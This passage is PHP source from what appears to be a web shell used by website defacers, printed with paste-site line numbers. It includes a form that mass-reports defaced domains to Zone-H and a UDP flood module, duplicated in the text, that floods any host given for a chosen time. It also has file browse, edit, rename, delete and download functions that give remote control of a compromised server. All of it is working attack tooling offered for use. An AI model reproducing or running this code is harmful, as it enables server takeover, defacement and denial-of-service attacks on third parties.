  3187. KthL3KgHPJS+zgXgfRZl5tcsPuC2NV7FAApARDqhAYl8OKHDOBiDLcYBB2iohQbpSMM+CjAxZyhCkO0oQVZuUIQRpFMMa+DBO8TQgOIb//jHXzcO4ptXbzTiE8ZvArvbgVchfGMNrjd+McQADKz/AwHKQD7/ozUqgkRIA/nSoEFe46GB4+cDAYGAO0adD/3jn1/vdxVGNpDP//73Hw208HidQAPJkAjZZ3zSgAaw9SidwHnFxwUC4w8lsAUjYAvEBxX1QAb78AX0IAaulw1RIQV9cAvgIgBBlxcSJEiKkBVDsAXuwAefAA1wIAZicH7+d3yOgFLMV326cIHFhwbIsF93dQd40H78Bw3SIAX3xgJwAAnHN34YFQGNAAdHSANEgFc9MA7HtwERYA931QON4IPHBw3zgIXTcINoyH8HgHH3AA1X0Ag2iHwbIAtOFSnGF2y5pVVUqD7BoIFAsAZwkA0gGCMYoAMkGC7tQHtphQKCdDHt/8CCWwADa3B+0FAKpdAA+4eGkMBj1ZAHeUWEboB8NIADacBwXrAGgth/pTAD+HdXh+CEd7hpLWUCfOB/B/AF79YD9HB8TIADTKZRg2AJ/lcKG/BphvUPGsANxscB+cAFzviM0AiNQpGJBxCATsUFolCL/XcAsrCAdmN8GyAx+TEFjTCJxVcffkgCRvMHkjEczVBtF2OCOVExjQg0J/gjkTgOcZiGxQcJNEAFkoZ1OHB9yJcNUoADYXBXEWALl3iDTYAMWIcMe4iJUPgPtmA02xgBVaaLxycFBqVXoeh/aICLrgiLDUADyBABKrmSLMmSyBAMGmFT1sgvB2CBtogLCv8WJuBYGQpQBbbAC8ZnczagCs0jBtlwcjkhD+HCc+KSiFNQj2gjB8TRBikAA+rQkPxYfPkFeHj1CgSJfI6AAPZQZXawBmlYCkwgfxjVA2J4ALKoUe9wg26plj1glsUXluV1VzTwQSWEAO+llk4wkUyQDtWAAoZ5mIh5mGFAADa4hjl5AMJoixink4JI
  3188. AzgBANvGB7ggiNlwYZRgMU4gBgp0VT5AXOHSDCWwB8tjgs+1PLrHMM4ABslwlZxZm7bJmWhAAOlAZV0JAx5zm/kgDKV4VzLgBrdpm/64D3g1CupQm3N5V6NgCccpiM/ZUnXJmcE5nIb1BYYwSY+0cC2FDEb/WZkTgGp45QLGmQ3VmJPA8JvHuZ7UNAecSQMM4wFQ4AbSwA2QAAl/wAWDYFAugAtsJgzoQAaqEC5kcIIp0HPhggI5kYKUAxceQAq2kJ7TaZsWgAAxAHb3Jg6WUArHmQ/I4Il3ZQlNeKGVSZJ3RQ+QwJnVqVG6eKEvmlHXKYgiSqItpQkLhVCakIsa0KLZQAPliWPoSZ0zGTUvIKNHajfzqRNDsARwMAMWMAN/wA2mZw/7UFZMQAl9QF7gogOvOY9Aswe6B6FAIwBYcQMK0AKWMJ4oKog7gADLp5ZZ9wbsMJ0i+osaxQdvSp6oxqcu+pZriYrTOaODip3IoKeU9oWE/xqkQzpfRaqeS9ovjXqb8GlU2dAEs6QTANAGF0ADThAMaLAD+ZCB0UAEwUBn9hANKKAA8UQGZOoPjAg07ZACs7o8imgnvRcOraCpvvqrv7oDOpiQeOV8cQCsv5qneMUHyNqsQvqnv2qo/9ADL9Csmiqt1OqryrqoeZWtmvqsROoG1zqpYVKt1nqpUeOr9EkcgjAPe2AKmXAAaLABudQO6XBL7aAKzeAPKVBKP9MOqtmgAQuV+3CPEth7L8AO1vqrORgPnZhXQpAMYrCwTfAHyKCcd/UCbUexfoUDqGYJ0Sqo02quzYqtJDsDyECs3HpXXwCy3/qo54We45qTc0CyyP+KrnajrloRA9XAS4OwlxVwC9HQDmnAqgrgLWTgYz63Vu2Amv5QAAy6mrunAEmgDgpLsY7wj6YwaUP4DbxAsU1ADGmJV4fwB2Abp2P5hS57rSLrrSXbtjZrdXg1b3Rbt3Z7tyLArC9rnnclszZDrjW7sDjbL766AQyjJH2AXNFABjHgDSMILu2ADiWg
  3189. A/sgABqogTB1mliRAlA5BUXiAUFgDFe7sJxVDe6GVwMprmDbBEygshqFDKN7rshwC3j1BXrLtnRps8Bqsr6qDUyAsS0lCm4wvMRbvMZLvMbAC3Dgq/jQiud1B+Y6uOUquIBbuKTCMCVwAjLwBchlDwLAc2H/YIJT0A6GCVMWw6BSKYFmijZkoBUA4AGsYLXcsLC5GQNCeFcT8A26K7hfgFdUcKwUywQRQLt3NQi3azNwK7gJrK5X6IoUOwM7sLELyw5r8A3wcMEYnMEZrAuqK72Be67Vyw3seL0M0wY8sAKUoLjRkAYFUAJk0A7/er4XQwbp268EqwNaoaYtwAetwA0+/MM/HGU2gALGGHcwwAdAnMRKvAPxEHj/MKVK/MO5eQqum1GT4AY/zI5wG8UibLJZzAX9e1cEoA1VqsQzgAAgQAUEAEJSQAOBUcY+/AdwzMVKzI6A+wJcbMc0K8XiyKlK4Aa0gAk9hwJycHs+l7lNua/+/6AArVmPCpDDCuAO9BAHXHzGc9qVi2AJtTDHdMwNYltlljaqUSzEgfBuX3AJ7ADHXszFq+zDHACRPMUCEBzFNBABe4AC1ZAO6TBDwoAGnfzLQOzBeMzKgBvEA5DDPMANXMAIrVkA44vISxl0JWDIBOtzeQEAzgAFvEAMf8AB+MABcswNyvBXO2idJHAAfelDUMIN2sAFE5ejPcAEXMABP8wBtHTJd2UHlgDEWpy7edzKnrwBqEYFaDADSYwGCJAO1HdYQBAGV2cMxADMv6zH8TnMdezB3OAIjpAPMnC4DKMGu+A7/pCCeyAHKLBWNPygDKoIt4qreZEgm7AL+MAQQP8RwRrtsNTnvxHwnelQAafQ0z9NSTTAARo9zvemCRNwQxHhl/HgWVWcamfACxo91VyYu1N91Rpd1V+osVc9A4jHU5rwBVKwATOw0UOEAxzaUpSABFjd1m7t1htwx2/
  3190. tCHFNs1P9VZ+XpoCQDw5yAymApYgoBymgYjlhw+JCyM4AlQaLIJuwFlJACAOwC0UdAXmwdkDQDtGwoyR1CHGg0bXgCM6bUYcVDYZAQyhgueYpAivQ1lptnVwN13CL1bVAA+/GAq+QBzZEBTDkWcAr2hSgDnMd3Kwt129d1/E51fjABYJwzStwAQHgA0XQAhVwMYogByWQAq3ZDp77tPXooKr/YgAlAAyP7Q838AFx8AeOILIrawWtMNXkkA/e9w+aEAZpULR8KwRecN5Y3dow+tqsHdtXrQzcQAB5hVinUA0UlZd39QuX8NnC/eB0TdxwDbjInQ/HbDtZkQr5IAn6AQV08MyC5LQ50dKUs93UgRdBgDgtEA4foNHqza3sfdVxcADxPV+FcAa0ANtWXdwAftXkQAyh3WgTAAPGAOEQvgG9QLP+vd9Jftwc8OQ7gAZ5nRWnAQXJQA5qUgQkHs1pBZVhajZF4A4M0ApP/uKLGuNPzgHK0AqHYG+LeuPGkOZyzgH8TaO+MOdyXudreed4Tg5HEOTz9Qow4AuOgOeGfuhz/47kNMvnhq7o8fnNaa7cGA4oSgAMRjAEzlACU7AHGogC1a0VBVCPJIZWKDbo5FDmdArjZC7na04CEUBpmiACukALiK7nI1vrcHvocdALr95oOPAEDBAKiD7sh+7oRvUCtd7kRjXnM0ACHg0oHSAJMEAcCWIkQzAEN/AZA7s8Jj4xE1gFXuAGws4BX72ys/gBhh4HbhACvd5dDQcDSLALw84F5Z5kK4Do9F67937o5EALIfDO3DUKrgADL1ALxH7wc84F1NAJc54PhxAO+L7wDX8IhZ7myW0EDzQxQVAayjEEjOABRZACKdAZ0lGPj4gV06zIWGEAPgAGA2AOq84B1/9ACXdQ8zZ/8zif8zg/CeiO5/gQCruwAn7wCypqWBNQCDCQDBcw7sM+8zkvBAzQ9DSP81A/7KHwAeFgApRQxBo1CjjgCklwCT2P8GT/
  3191. 5HBAAiYQAmmf9n4Q9Yh+9mof9ybgB96MD3Y/05OgIH8EGj8iB6wABlXABmwwAj/gA5zbiCt4LbOKIHeCCGfgC+Rw97vgCwxQ+ZZ/+Zif+Zff3JF/955v9xxADhdgDrogDvKWAa4gCfBwBuZAC7T1+bD/85Of+SvQC7Fv90BP+Zhf+7fv+eTgCzAACkkgAvMmb5KQBGewAh/Q+8zf/Lg/+7tv+7ef+5nvC7EPY3ofOSzv8u7/UAWLkAznQAF1QLmNmAIUw7RFknJs4AXS7/zu//6xH/QXsPyw7wtIYA6+INO3L//0DxD4BA4kKHAXAy/mLhDcteISg4UFCX4wR8FbiAutJG7k2JHjB1++PnxwCNHjyY7W8JGIBQCAAX8xZc6MaaBNi0vmkq248OFIvgh59g0lSpSMzBTtiE6ZaTMFFhgryKGkWpXjBSQmrPTaeOHfP0y1rmbdWtVXiK8fCLY69PWIR19WWHxFwMHqXYlYtV6g1fbfVLwbdwwmbG0HjxI3YNJk7O+Ggkm9fBpGQ+PUrTBFi+qIOaUoU5kGShQpMOBSL8OEVa9WTe7CCtSqn13wtWuH/7VeK3wdUd0Qye7BDCj9A3Ght6+eX5kMns0A+A7hxI3fzv18sOsV56x8nbGaCffeunnv8NXjXw4CNAw3XGF79RHk43fsQv4MN89nhOEjYRA7enEIaACPOvFYm69AA1ezxjBBhnipMZoeG6EXTgab4QBhqsFMM6Kc8UcHotoBrabHImHjjAvyI6yhhIxzyAsGHDoDhkVE8IYCBkjyAoYkRDDhEiTOEMebDJJh4IhedvSGSC/4W8E8F2i75IxFkvBGhtp2mKGhZGws0pwYoSQBuWSGLHIF3i7o8sbt/snHwBms8WVHGGAg8pIVdDOPgDcvUNKbM5BwMZkqM8hgxjoX8f9GhDqHFAEiaxhIJoMlKWjyHDF7sW2GOFcok0gjP9hhBTrtzOCS6RIsjJNdzHBwMQj9GUIOd1IcLJ8NnEAhDQ6JagaFEBWgCQAPpoAK
  3192. zdV6abMX8r6yYoXhvgDhKxas8OXJfyKYywkKhvtqFBOQ8MKOub7FyLyv/lH2q2lH8eqfbnyZ5It0Rzk33X/89PYfe1cg4ZJp/2GBiq8skK2btHz5apBRvuqBJ3z/+QAJSsplgRJ/V/jKWxkWLpcSO9IFISQ9Gk53EAbQdcuvhiaJoN5nj9D4H4YdvsA9VW/j5BlRUHk1Vn9Gm+SCCnewYIM7TlGqV81QEHYmAJwBAwtJzIH/IDXCnkH4n+6O+AqTXZD5loC5RkESXRZYyGXagXMQWI+O/6GCALdZ4IIKFjQZpYd1MElXEypg+Srel1lA5gtNWJgBb71zOIJtKurW45xBvoonnnINJowTv/+xZpd0I/9KmBlyyPsVxwO+/Kso3/1H73WoFf2r2XPZxW303P4nF8b3XmeetLA1HN0rLugldN2FwVrVOJ85QhQf2ngQQgB8GGAXa7qbYQNKyIiG6aL2KKGpqMFoZgAvKDTwu38MnkG5GQj455UDMPwqn9L/IWKDYPKZSwpOuQ0ZwfiKFDjBBQJIAQ0WyAEQkLHA72jCBQe4hgW+QoPj/SMTBwhGDCgR/wwuNBAZXNjB/wL4D2S8oGHx2MABMNc+79zvfYZDAxoaRgALcKEHDiThXJBRP7GxYBfPEFgEOMgFgT3wAHlTonJ2wAQCkPAYysmHCCH4lWf4BRMHQIN5HGeNJNbwht1RDafMeMZ1cOIIklAAIxQDIQPcQBD5sAD+8oEGF6The+DbRwFoEkcfTG0AySDBM85oxnywjwszyAcV5deDGkqhYFVkgRHRwD4mZBJvkNwHEObSA2Qsg5GmiyIXIhiMA+RQOexDAxdq2EoGsgCHmNTkecD4j3lE8iuLPKMiG4nLGrqtlKS0APu4yIUDwE9gwkglElmQS2dCUznPIEE9qGCyf/9IIZalZF/8+IWGO0qSa7/
  3193. MJRqEyctDptOMc4DAJOTgjBIYAFaMkQQXLTADCwQjMxwCAhD2IYCnheYxU0DHIFOkTkayLx+w4IQjz8MFU+6yiv/gJr7yto8IoGEDEYgGEKh1hWcIs46sxJ8F/5HJSR4BAhAwpDATaVFN7OMLSDwp/hR5SF8WkAsMpGgdz8m+Oq7jfdn8pRQWaVKjInWnyiHBy/hFMKKK9KXtk18O7jmDnGZzp+dEKEJh8Yx2/sADP4OQO5iwgQXmAxn9ZCsQXvEKImDhjwAYAmnQwQMvXOAYXZ3qLi5AggLmo6pcmCphz8mFDQgMnPmgwQZ2egAa5GP/HgiYCwHyRwA13pSRykns7kRBATsM4grWEOb2FJsPxjoWDXMRxgX04IRdnrGwRUXtOScaxc5eQw8MaIsmaKDUzRIVqXRUzjUuqMqoUjSzu0SAwCCwAlGIbRQQDext0dnVQ64DrHpoQRGcoZh5zqQc3pCCY+dAibe+QhOawIEQjhCAptzAAylohhYkcQkScAK7UxWGHgjGAqOSrQc7laTdQqiJKOaDC+qlAjDa8szmwusIBxgFD93WYGB8hwVo4JQFNZFLIsjtHCZQTgjltgwujAJwDn7dPFx4niuEQHccRmSBqQvgHOYAwVtlQTxcaZ5R6MEPo6hkKwVmVHweWZU4/0bihzHJCbJ92MQYjqBGXyHiEOTNBUYGMER1HEXsIlS7ELiAO36ggDa8EULlIMRvL+AHV2RABOK4wAEyIFBGyCES6HBHEkQBAWaE2QJoIMI+EveFPLQjE2hARh4m0Mp5hCEPXET0A9eBhkzkwaMsAIIl46GJr2iiHYZoYQSAAGopzEMV0TgAp7gABEUfABPRAPXrMoqGeJz6w/VIw6Y7Xb9gdDRtX2jHpM9ogUhPGg2SnocrEb1lNDwbDbLOw5X/AYQ0bBEN+8hDJgj76jyUEwjhruE+0rDBCahCvUCYwC2ccABTo3oe0UhD/ZxA66/swwZo3Xa3W1lpNAg1zOlcx/8x/
  3194. DqJFmyhjTeYHmMCIANmkEAPoiABGuqxBJncgBFFmEJ9eUABPUAAFgOfARowcYcYDCIYv/gFKjMxiHdzIRiUGIS9B7FoOsoa5TFwAloPkCsbxCDlqOQgym0QjGAMouYzuLQLVF6/kwu959MOhtGvsYGo8xytFtB5yjHxi6WbMZ805yLNg1FDJwyiHmi/+QLRkHShP33QZudC01VeQ6efHQ0032LVY3AHTKT93UiLwdGTXnNkRv0Og2jhhfLO9kUfErWTp3zlUQuLOUj8CS0AQxHGCl7GGKGV+NwAAtRQEx9sIRL1HQAMzkGCY6zD8rPP+QZsb/v6uTL3g65fK6f/3UrUcv32jkUtMoe/2J/jvn5cLH7vLSD82xM2H8lvofGjH3zq436xwZ82F2toT2TmPvwHkL5GtY/a76c1/G7v/h2XD33lt5L6y2c+/Il/x/aPX/q05z/lmUFmUXgCDCCFFPA8Z2iDxAAAmXAH8tsAKSCEmFAAMCgAHdCC1huaOYCF/ttADuxAD/xAEAxBERxBEixBEwzBggNAChiAKkCESACDFJADBVAAHzhAHjgaEwgABSgAdNACd5AEcRCUDDxBIixCIzxCJExCI3w+JmxCJ3zC5zsGYJC4SaCAJ3AHNsCCKmgGLiyAKfizExgBdxgAIJwEipsDZoBCNVxDNmxDETd8QziMQzmcQzqsQzu8w4AAADs%3D" style="width: 261px; height: 67px;" /></p>
  3195. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="AL.MaX HaCkEr" /><br> <select class="inputz" name="hackmode">
  3196. <option>------------------------------------SELECT-------------------------------------</option>
  3197. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  3198. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  3199. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  3200. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  3201. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  3202. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  3203. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  3204. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  3205. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  3206. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  3207. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  3208. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  3209. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  3210. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  3211. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  3212. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  3213. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  3214. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  3215. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  3216. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  3217. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  3218. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  3219. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  3220. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  3221. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  3222. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  3223. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  3224. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  3225.  
  3226. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  3227. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  3228. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  3229. </select> <br>
  3230.  
  3231. <select class="inputz" name="reason">
  3232. <option >------------------------------------SELECT-------------------------------------</option>
  3233. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  3234. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  3235. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  3236. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  3237. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  3238. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  3239. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  3240. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  3241. </select> <br>
  3242. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  3243. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  3244. </form>'; ?>
  3245. <?
  3246. echo "</form></center>";?>
  3247. <?
  3248. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  3249. {
  3250. $k = curl_init();
  3251. curl_setopt($k, CURLOPT_URL, $url);
  3252. curl_setopt($k,CURLOPT_POST,true);
  3253. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  3254. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  3255. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  3256. $kubra = curl_exec($k);
  3257. curl_close($k);
  3258. return $kubra;
  3259. }
  3260. {
  3261. ob_start();
  3262. $sub = @get_loaded_extensions();
  3263. if(!in_array("curl", $sub))
  3264. {
  3265. die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  3266. }
  3267.  
  3268. $hacker = $_POST['defacer'];
  3269. $method = $_POST['hackmode'];
  3270. $neden = $_POST['reason'];
  3271. $site = $_POST['domain'];
  3272.  
  3273. if (empty($hacker))
  3274. {
  3275. die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  3276. }
  3277. elseif($method == "--------SELECT--------")
  3278. {
  3279. die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  3280. }
  3281. elseif($neden == "--------SELECT--------")
  3282. {
  3283. die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  3284. }
  3285. elseif(empty($site))
  3286. {
  3287. die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  3288. }
  3289. $i = 0;
  3290. $sites = explode("\n", $site);
  3291. while($i < count($sites))
  3292. {
  3293. if(substr($sites[$i], 0, 4) != "http")
  3294. {
  3295. $sites[$i] = "http://".$sites[$i];
  3296. }
  3297. ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  3298. echo "Domain : ".$sites[$i]." Defaced Last Years !";
  3299. ++$i;
  3300. }
  3301. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  3302. }
  3303. ?>
  3304. <?php }
  3305.  
  3306. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  3307. {
  3308. ?>
  3309. <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  3310. <?php
  3311.  
  3312. //UDP
  3313. if(isset($_GET['host'])&&isset($_GET['time']))
  3314. {
  3315. $packets = 0;
  3316. ignore_user_abort(TRUE);
  3317. set_time_limit(0);
  3318.  
  3319. $exec_time = $_GET['time'];
  3320.  
  3321. $time = time();
  3322. //print "Started: ".time('d-m-y h:i:s')."<br>";
  3323. $max_time = $time+$exec_time;
  3324.  
  3325. $host = $_GET['host'];
  3326.  
  3327. for($i=0;$i<65000;$i++){
  3328. $out .= 'X';
  3329. }
  3330.  
  3331. while(1){
  3332. $packets++;
  3333. if(time() > $max_time){ break; }
  3334. $rand = rand(1,65000);
  3335. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  3336. if($fp){
  3337. fwrite($fp, $out);
  3338. fclose($fp);
  3339. }
  3340. }
  3341.  
  3342. echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  3343. echo '<br><br>
  3344. <form action="'.$surl.'" method=GET>
  3345. <input type="hidden" name="act" value="phptools">
  3346. Host: <br><input type=text name=host><br>
  3347. Length (seconds): <br><input type=text name=time><br>
  3348. <input type=submit value=Go>
  3349. </form>';
  3350. }
  3351. else
  3352. {
  3353. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  3354. <table class="tabnet" style="width:300px;">
  3355. <tr>
  3356. <th colspan="2">UDP Flood</th>
  3357. </tr>
  3358. <tr>
  3359. <td>&nbsp;&nbsp;Host</td>
  3360. <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  3361. </tr>
  3362. <tr>
  3363. <td>&nbsp;&nbsp;Length (seconds)</td>
  3364. <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  3365. </tr>
  3366. <tr>
  3367. <td><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
  3368. </tr>
  3369. </table>
  3370. </center>';
  3371. }
  3372. }
  3373.  
  3374. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  3375. {
  3376. ?>
  3377. <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  3378. <?php
  3379.  
  3380. //UDP
  3381. if(isset($_GET['host'])&&isset($_GET['time']))
  3382. {
  3383. $packets = 0;
  3384. ignore_user_abort(TRUE);
  3385. set_time_limit(0);
  3386.  
  3387. $exec_time = $_GET['time'];
  3388.  
  3389. $time = time();
  3390. //print "Started: ".time('d-m-y h:i:s')."<br>";
  3391. $max_time = $time+$exec_time;
  3392.  
  3393. $host = $_GET['host'];
  3394.  
  3395. for($i=0;$i<65000;$i++){
  3396. $out .= 'X';
  3397. }
  3398.  
  3399. while(1){
  3400. $packets++;
  3401. if(time() > $max_time){ break; }
  3402. $rand = rand(1,65000);
  3403. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  3404. if($fp){
  3405. fwrite($fp, $out);
  3406. fclose($fp);
  3407. }
  3408. }
  3409.  
  3410. echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  3411. echo '<br><br>
  3412. <form action="'.$surl.'" method=GET>
  3413. <input type="hidden" name="act" value="phptools">
  3414. Host: <br><input type=text name=host><br>
  3415. Length (seconds): <br><input type=text name=time><br>
  3416. <input type=submit value=Go>
  3417. </form>';
  3418. }
  3419. else
  3420. {
  3421. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  3422. <table class="tabnet" style="width:300px;">
  3423. <tr>
  3424. <th colspan="2">UDP Flood</th>
  3425. </tr>
  3426. <tr>
  3427. <td>&nbsp;&nbsp;Host</td>
  3428. <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  3429. </tr>
  3430. <tr>
  3431. <td>&nbsp;&nbsp;Length (seconds)</td>
  3432. <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  3433. </tr>
  3434. <tr>
  3435. <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
  3436. </tr>
  3437. </table>
  3438. </center>';
  3439. }
  3440. }
  3441.  
  3442.  
  3443. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
  3444. {
  3445. @ob_start();
  3446. @eval("phpinfo();");
  3447. $buff = @ob_get_contents();
  3448. @ob_end_clean();
  3449. $awal = strpos($buff,"<body>")+6;
  3450. $akhir = strpos($buff,"</body>");
  3451. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  3452. }
  3453.  
  3454. elseif(isset($_GET['view']) && ($_GET['view'] != ""))
  3455. {
  3456. if(is_file($_GET['view']))
  3457. {
  3458. if(!isset($file)) $file = magicboom($_GET['view']);
  3459. if(!$win && $posix)
  3460. {
  3461. $name=@posix_getpwuid(@fileowner($file));
  3462. $group=@posix_getgrgid(@filegroup($file));
  3463. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  3464. }
  3465. else { $owner = $user; }
  3466. $filn = basename($file);
  3467. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  3468. <tr>
  3469. <td>Filename</td>
  3470. <td>
  3471. <span id=\"".clearspace($filn)."_link\">".$file."</span>
  3472. <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  3473. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  3474. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  3475. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  3476. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  3477. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  3478. </form>
  3479. </td>
  3480. </tr>
  3481. <tr>
  3482. <td>Size</td>
  3483. <td>".ukuran($file)."</td>
  3484. </tr>
  3485. <tr>
  3486. <td>Permission</td>
  3487. <td>".get_perms($file)."</td>
  3488. </tr>
  3489. <tr>
  3490. <td>Owner</td>
  3491. <td>".$owner."</td>
  3492. </tr>
  3493. <tr>
  3494. <td>Create time</td>
  3495. <td>".date("d-M-Y H:i",@filectime($file))."</td>
  3496. </tr>
  3497. <tr>
  3498. <td>Last modified</td>
  3499. <td>".date("d-M-Y H:i",@filemtime($file))."</td>
  3500. </tr>
  3501. <tr>
  3502. <td>Last accessed</td>
  3503. <td>".date("d-M-Y H:i",@fileatime($file))."</td>
  3504. </tr>
  3505. <tr>
  3506. <td>Actions</td>
  3507. <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  3508. | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  3509. | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  3510. | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  3511. </td>
  3512. </tr>
  3513. <tr>
  3514. <td>View</td>
  3515. <td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a>
  3516. | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a>
  3517. | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">img</a>
  3518. </td>
  3519. </tr>
  3520. </table> ";
  3521. if(isset($_GET['type']) && ($_GET['type']=='image'))
  3522. { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; }
  3523. elseif(isset($_GET['type']) && ($_GET['type']=='code'))
  3524. { echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; }
  3525. else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; }
  3526. }
  3527. elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
  3528. }
  3529.  
  3530. elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
  3531. {
  3532. if(isset($_POST['save']))
  3533. {
  3534. $file = $_POST['saveas'];
  3535. $content = magicboom($_POST['content']);
  3536. if($filez = @fopen($file,"w"))
  3537. {
  3538. $time = date("d-M-Y H:i",time());
  3539. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  3540. else $msg = "failed to save"; @fclose($filez);
  3541. }
  3542. else $msg = "permission denied";
  3543. }
  3544. if(!isset($file)) $file = $_GET['edit'];
  3545. if($filez = @fopen($file,"r"))
  3546. {
  3547. $content = "";
